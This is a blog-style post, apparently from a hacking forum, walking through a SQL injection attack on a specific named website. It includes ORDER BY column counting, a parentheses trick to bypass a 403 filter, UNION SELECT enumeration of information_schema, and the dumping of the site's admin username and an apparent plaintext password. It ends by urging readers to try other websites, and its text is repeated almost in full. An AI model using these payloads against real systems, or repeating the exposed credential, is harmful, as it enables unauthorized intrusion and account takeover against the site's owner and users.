Bài liên quan
SQL UNHEX --- 403 --- LIMIT.
Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS
http://ibms.co/about.php?pid=34 ### is ok ###
http://ibms.co/about.php?pid=34' ### error ##
Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://ibms.co/about.php?pid=34+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+30--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+40--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+50--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+60--+- ### is ok ###
WTF i'm drunk ....mmm not ... here the solution ..add ---> ' <---
example: /about.php?pid=34'+order+by+1--+-
http://ibms.co/about.php?pid=34'+order+by+1--+-
start again
http://ibms.co/about.php?pid=34'+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+30--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+29--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+28--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+27--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+26--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+25--+- ### is ok ###
Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45
ok 25 Tables
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
now union+select
http://ibms.co/about.php?pid=34'+union+s...,24,25--+-
D: damn 403 f**k... i not want live in this world anymore...this website is secure D: ......
don't worry here the solution
add ( and )
example: /about.php?pid=34'+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25)--+-
http://ibms.co/about.php?pid=34'+union+(...24,25)--+-
done... now is ok again ..but not show the f**k column vulnerable...
only add ---> - <---
example: /about.php?pid=-34'+union+(select+1,2,3,
http://ibms.co/about.php?pid=-34'+union+...4,25)--+-
well now show columns 6 and 7
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
now
add: unhex(hex(table_name)) +from+information_schema/**/.tables+where+table_schema=database()+LIMIT+0,200--+-
example
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+0,200)--+- ### ( show "Admin" ) ###
done luck today in the first table ---admin is Admin Meh ok next
change the 0 by LIMIT to 1
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+1,200)--+- ### ( show "Contact" ) ### ok leave it . already have the name ... is admin u see it before ...
ok now columns
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
############# now the columns ############
add: +union+select+1,unhex(hex(column_name)) +from+information_schema/**/.columns+where+table_schema=database()+LIMIT+0,200--+-
example:
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+0,200)--+- ### ( show "Id" ) ###
but we need user and pass.let's go to search it only change +LIMIT+0,200--+- TO +LIMIT+1,200--+-
and +LIMIT+2,200--+- and +LIMIT+3,200--+- etc....
########## this show username or admin user #################
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+1,200)--+- ###( show "Username" )###
done here the username but continue searching for the pass .....change it for 2 and 3 etc ...
########### this show password #################
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+2,200)--+- ###( show "Password" )###
well username and password by admin
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++
now dump dates ...
add: unhex(hex(username)) and +from+admin)--+-
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-
###( show "admin" ) = username = admin) ###
now column "password"
example: unhex(hex(password)),3,4,5,6, and +from+admin--+-
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-
###( show "Ibmsanusha" ) = password = Ibmsanusha )###
Done..Enjoy testing others Websites.
REMEMBER
Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS
Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS
http://ibms.co/about.php?pid=34 ### is ok ###
http://ibms.co/about.php?pid=34' ### error ##
Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://ibms.co/about.php?pid=34+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+30--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+40--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+50--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+60--+- ### is ok ###
WTF i'm drunk ....mmm not ... here the solution ..add ---> ' <---
example: /about.php?pid=34'+order+by+1--+-
http://ibms.co/about.php?pid=34'+order+by+1--+-
start again
http://ibms.co/about.php?pid=34'+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+30--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+29--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+28--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+27--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+26--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+25--+- ### is ok ###
Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45
ok 25 Tables
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
now union+select
http://ibms.co/about.php?pid=34'+union+s...,24,25--+-
D: damn 403 f**k... i not want live in this world anymore...this website is secure D: ......
don't worry here the solution
add ( and )
example: /about.php?pid=34'+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25)--+-
http://ibms.co/about.php?pid=34'+union+(...24,25)--+-
done... now is ok again ..but not show the f**k column vulnerable...
only add ---> - <---
example: /about.php?pid=-34'+union+(select+1,2,3,
http://ibms.co/about.php?pid=-34'+union+...4,25)--+-
well now show columns 6 and 7
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
now
add: unhex(hex(table_name)) +from+information_schema/**/.tables+where+table_schema=database()+LIMIT+0,200--+-
example
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+0,200)--+- ### ( show "Admin" ) ###
done luck today in the first table ---admin is Admin Meh ok next
change the 0 by LIMIT to 1
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+1,200)--+- ### ( show "Contact" ) ### ok leave it . already have the name ... is admin u see it before ...
ok now columns
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
############# now the columns ############
add: +union+select+1,unhex(hex(column_name)) +from+information_schema/**/.columns+where+table_schema=database()+LIMIT+0,200--+-
example:
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+0,200)--+- ### ( show "Id" ) ###
but we need user and pass.let's go to search it only change +LIMIT+0,200--+- TO +LIMIT+1,200--+-
and +LIMIT+2,200--+- and +LIMIT+3,200--+- etc....
########## this show username or admin user #################
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+1,200)--+- ###( show "Username" )###
done here the username but continue searching for the pass .....change it for 2 and 3 etc ...
########### this show password #################
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+2,200)--+- ###( show "Password" )###
well username and password by admin
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++
now dump dates ...
add: unhex(hex(username)) and +from+admin)--+-
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-
###( show "admin" ) = username = admin) ###
now column "password"
example: unhex(hex(password)),3,4,5,6, and +from+admin--+-
http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-
###( show "Ibmsanusha" ) = password = Ibmsanusha )###
Done..Enjoy testing others Websites.
REMEMBER
Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS
Post a Comment